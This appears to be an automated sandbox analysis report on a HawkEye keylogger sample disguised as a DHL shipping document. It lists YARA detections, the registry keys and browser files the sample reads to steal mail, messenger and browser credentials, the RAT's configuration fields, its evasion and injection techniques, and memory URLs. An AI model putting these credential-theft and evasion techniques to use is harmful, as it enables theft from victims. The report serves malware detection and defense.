            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: avgcsrvx.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: avgnt.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: hijackthis.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: avgui.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: avgwdsvc.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: mbam.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpBinary or memory string: ComboFix.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected MailPassViewShow sources
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 24.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 24.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.525571222.000000000330E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.526864554.00000000041F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.278922139.0000000004A65000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Tries to steal Mail credentials (via file registry)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword24_2_00402D74
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword24_2_00402D74
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword24_2_004033B1
            Yara detected WebBrowserPassView password recovery toolShow sources
            Source: Yara matchFile source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.526864554.00000000041F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.278922139.0000000004A65000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Tries to steal Instant Messenger accounts or passwordsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Detected HawkEye RatShow sources
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation111Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API11Scheduled Task/Job1Process Injection412Deobfuscate/Decode Files or Information11Credentials in Registry2Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothRemote Access Software1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsShared Modules1Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information4Credentials In Files1File and Directory Discovery2SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing23NTDSSystem Information Discovery19Distributed Component Object ModelClipboard Data1Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery231SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection412DCSyncProcess Discovery4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 502165 Sample: DHL_AWB 518877882999_887755... Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 Detected unpacking (changes PE section rights) 2->45 47 13 other signatures 2->47 7 DHL_AWB 518877882999_887755468_pdf.exe 7 2->7         started        process3 file4 23 C:\Users\user\AppData\Roaming\cmsyNzu.exe, PE32 7->23 dropped 25 C:\Users\user\...\cmsyNzu.exe:Zone.Identifier, ASCII 7->25 dropped 27 C:\Users\user\AppData\Local\...\tmp70BF.tmp, XML 7->27 dropped 29 DHL_AWB 5188778829...7755468_pdf.exe.log, ASCII 7->29 dropped 10 DHL_AWB 518877882999_887755468_pdf.exe 5 7->10         started        13 schtasks.exe 1 7->13         started        process5 signatures6 49 Writes to foreign memory regions 10->49 51 Allocates memory in foreign processes 10->51 53 Sample uses process hollowing technique 10->53 55 Injects a PE file into a foreign processes 10->55 15 vbc.exe 1 10->15         started        19 vbc.exe 10->19         started        21 conhost.exe 13->21         started        process7 dnsIp8 31 192.168.2.1 unknown unknown 15->31 33 Tries to steal Mail credentials (via file registry) 15->33 35 Tries to harvest and steal browser information (history, passwords, etc) 15->35 37 Tries to steal Instant Messenger accounts or passwords 19->37 39 Tries to steal Mail credentials (via file access) 19->39 signatures9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL_AWB 518877882999_887755468_pdf.exe33%VirustotalBrowse
            DHL_AWB 518877882999_887755468_pdf.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\cmsyNzu.exe100%Joe Sandbox ML

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.2.DHL_AWB 518877882999_887755468_pdf.exe.f40000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
            11.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
            7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            https://pki.goog/repository/00%URL Reputationsafe
            https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=10%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
            http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxMmRiZGQ2ZTMxY2I0MTYxNmZjOWNjNjExZDU3MzhiY2UwN0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            https://aefd.nelreports.net/api/report?cat=bingth0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxOGQyZTYxNTQ5NjE3M2VjYzlkYWMyMWExY2Q4ZDFlYTRmM0%Avira URL Cloudsafe
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ3OGFmNTY2YzEzMzI1ZTIwNzU3Y2FhOTg3NTNjNGRmMzYwZ0%Avira URL Cloudsafe
            http://pomf.cat/upload.php0%Avira URL Cloudsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg0%URL Reputationsafe
            http://sb.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
            https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt0%URL Reputationsafe
            http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://googleads.g.doubleclick.net/pagead/html/r20190624/r20190131/zrt_lookup.htmlbhvE48A.tmp.11.drfalse
              		high
              https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9bhvE48A.tmp.11.drfalse
                		high
                http://www.msn.combhvE48A.tmp.11.drfalse
                  		high
                  http://www.fontbureau.com/designersDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                    		high
                    http://www.nirsoft.netvbc.exe, 0000000B.00000002.301955681.000000000019C000.00000004.00000001.sdmpfalse
                      		high
                      https://deff.nelreports.net/api/report?cat=msnbhvE48A.tmp.11.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://contextual.media.net/__media__/js/util/nrrV9140.jsbhvE48A.tmp.11.drfalse
                        		high
                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drfalse
                          		high
                          https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.jsbhvE48A.tmp.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.pngbhvE48A.tmp.11.drfalse
                            		high
                            https://www.google.com/chrome/bhvE48A.tmp.11.drfalse
                              		high
                              https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1bhvE48A.tmp.11.drfalse
                                		high
                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gbhvE48A.tmp.11.drfalse
                                  		high
                                  https://cvision.media.net/new/286x175/2/79/227/59/931bcbc9-c308-445b-ac87-70a69b051455.jpg?v=9bhvE48A.tmp.11.drfalse
                                    		high
                                    http://www.galapagosdesign.com/DPleaseDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://cvbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.zhongyicts.com.cnDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpfalse
                                        		high
                                        https://googleads.g.doubleclick.net/pagead/ht66vbc.exe, 0000000B.00000002.302227733.0000000000AB0000.00000004.00000040.sdmpfalse
                                          		high
                                          https://www.google.com/chrome/static/images/fallback/icon-file-download.jpgbhvE48A.tmp.11.drfalse
                                            		high
                                            http://cdn.adnxs.com/v/s/169/trk.jsbhvE48A.tmp.11.drfalse
                                              		high
                                              http://s.amazon-adsystem.com/v3/pr?exlist=an&fv=1.0&a=cm&cm3ppd=1vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drfalse
                                                		high
                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeebhvE48A.tmp.11.drfalse
                                                  		high
                                                  https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cbhvE48A.tmp.11.drfalse
                                                    		high
                                                    https://p.rfihub.com/cm?in=1&pub=345&userid=3011883223893104794bhvE48A.tmp.11.drfalse
                                                      		high
                                                      https://www.google.com/chrome/static/images/download-browser/pixel_phone.pngbhvE48A.tmp.11.drfalse
                                                        		high
                                                        https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.pngbhvE48A.tmp.11.drfalse
                                                          		high
                                                          https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookiebhvE48A.tmp.11.drfalse
                                                            		high
                                                            https://pki.goog/repository/0bhvE48A.tmp.11.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1bhvE48A.tmp.11.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://cm.adform.net/pixel?adform_pid=16&adform_pc=3011883223893104794bhvE48A.tmp.11.drfalse
                                                              		high
                                                              http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvE48A.tmp.11.drfalse
                                                                		high
                                                                http://cdn.taboola.com/TaboolaCookieSyncScript.jsbhvE48A.tmp.11.drfalse
                                                                  		high
                                                                  http://www.carterandcone.comlDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.msn.com/bhvE48A.tmp.11.drfalse
                                                                    		high
                                                                    https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhvE48A.tmp.11.drfalse
                                                                      		high
                                                                      https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhvE48A.tmp.11.drfalse
                                                                        		high
                                                                        https://www.google.com/accounts/serviceloginvbc.exefalse
                                                                          		high
                                                                          http://trc.taboola.com/p3p.xmlbhvE48A.tmp.11.drfalse
                                                                            		high
                                                                            http://crl.pki.goog/gsr2/gsr2.crl0?bhvE48A.tmp.11.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://pki.goog/gsr2/GTSGIAG3.crt0)bhvE48A.tmp.11.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhvE48A.tmp.11.drfalse
                                                                              		high
                                                                              http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxMmRiZGQ2ZTMxY2I0MTYxNmZjOWNjNjExZDU3MzhiY2UwNbhvE48A.tmp.11.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.founder.com.cn/cn/bTheDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://aefd.nelreports.net/api/report?cat=bingthbhvE48A.tmp.11.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://www.google.com/chrome/static/images/homepage/google-canary.pngbhvE48A.tmp.11.drfalse
                                                                                		high
                                                                                http://ib.adnxs.com/getuid?http://s.amazon-adsystem.com/ecm3?id=$UID&ex=appnexus.comvbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drfalse
                                                                                  		high
                                                                                  https://sync.outbrain.com/cookie-sync?p=medianet&uid=2046425540973639000V10bhvE48A.tmp.11.drfalse
                                                                                    		high
                                                                                    https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.pngbhvE48A.tmp.11.drfalse
                                                                                      		high
                                                                                      https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhvE48A.tmp.11.drfalse
                                                                                        		high
                                                                                        https://www.google.com/chrome/static/js/main.v2.min.jsbhvE48A.tmp.11.drfalse
                                                                                          		high
                                                                                          https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpgbhvE48A.tmp.11.drfalse
                                                                                            		high
                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfbhvE48A.tmp.11.drfalse
                                                                                              		high
                                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.drfalse
                                                                                                		high
                                                                                                http://www.typography.netDDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://fontfabrik.comDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvE48A.tmp.11.drfalse
                                                                                                  		high
                                                                                                  https://www.google.com/chrome/static/images/fallback/icon-youtube.jpgbhvE48A.tmp.11.drfalse
                                                                                                    		high
                                                                                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxOGQyZTYxNTQ5NjE3M2VjYzlkYWMyMWExY2Q4ZDFlYTRmMbhvE48A.tmp.11.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkMbhvE48A.tmp.11.drfalse
